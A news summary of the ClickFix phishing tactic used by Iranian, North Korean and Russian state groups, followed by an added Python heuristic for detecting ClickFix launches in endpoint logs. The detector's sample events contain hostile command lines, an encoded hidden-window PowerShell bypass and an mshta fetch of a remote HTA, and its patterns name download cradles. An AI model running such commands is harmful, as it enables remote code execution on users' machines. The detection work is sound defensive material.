State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns

Summary: Various state-sponsored hacking groups from Iran, North Korea, and Russia have adopted the ClickFix social engineering tactic to deploy malware in a series of phishing campaigns from late 2024 into early 2025. This approach has evolved from cybercrime applications to being utilized by nation-state actors, who manipulate targets into executing malicious commands under the guise of technical fixes. Reports indicate this technique enhances existing infection chains without completely redefining them, showcasing its appeal across various state-sponsored threat groups.

Affected: Multiple state-sponsored hacking groups (TA427, TA450, UNK_RemoteRogue, TA422)

Key points:

  • ClickFix is a method prompting users to self-infect their machines under the pretext of addressing issues.
  • TA427’s campaign involved sophisticated phishing tactics, targeting individuals in think tanks by impersonating a Japanese diplomat.
  • MuddyWater utilized ClickFix to deploy remote management software to facilitate espionage, targeting sectors like finance and healthcare.
  • UNK_RemoteRogue employed ClickFix tactics against major defense manufacturers through manipulated communications, underscoring how widely the technique has been adopted among threat actors.
  • Reports suggest the technique’s ongoing evolution, indicating potential future use by other state-sponsored groups.
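The ClickFix pattern described in the key points, a user pasting a supposed "fix" command into a run prompt, leaves a process-tree signature a defender can hunt for in endpoint telemetry. The heuristic below is an added example written for this summary, not code from the article or from the reports it cites; the sample events, the indicator list and the set of runner binaries are constructed assumptions, and the explorer.exe parent relationship for Win+R launches is general Windows behaviour rather than something the article states.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1 fields, flattened to
# one line each) written for this example; they are not logs from the campaigns.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4A",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\mshta.exe|CommandLine=mshta https://example.invalid/verify.hta",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe readme.txt",
    "ParentImage=C:\\Program Files\\Editor\\code.exe|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|CommandLine=powershell -File build.ps1",
]

# Script runners and download-capable binaries a pasted one-liner typically invokes (assumed list).
RUNNER_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "curl.exe", "certutil.exe"}

# Command-line traits that separate a pasted payload from ordinary interactive use.
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "encoded_command": re.compile(r"-(enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "download_cradle": re.compile(r"\b(iex|irm|iwr|downloadstring)\b", re.I),
}

def parse_event(line):
    """Split 'Key=Value|Key=Value' into a dict (values may contain '=' but not '|')."""
    return dict(field.split("=", 1) for field in line.split("|"))

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def score_event(event):
    """Return the indicator names that fire for one event; empty means no finding.
    Heuristic: explorer.exe (the parent of a command launched from the Win+R dialog)
    spawning a script runner whose command line shows download/obfuscation traits."""
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return []
    if basename(event.get("Image", "")) not in RUNNER_IMAGES:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]

def detect_clickfix(lines):
    """Return (line index, reasons) for every event with at least one indicator."""
    scored = ((idx, score_event(parse_event(line))) for idx, line in enumerate(lines))
    return [(idx, reasons) for idx, reasons in scored if reasons]

if __name__ == "__main__":
    for idx, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
```

The two benign events (a text editor opened from the desktop, and PowerShell started by a developer tool) produce no finding, which is the point of keying on the parent process rather than on the interpreter alone.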

Source: https://thehackernews.com/2025/04/state-sponsored-hackers-weaponize.html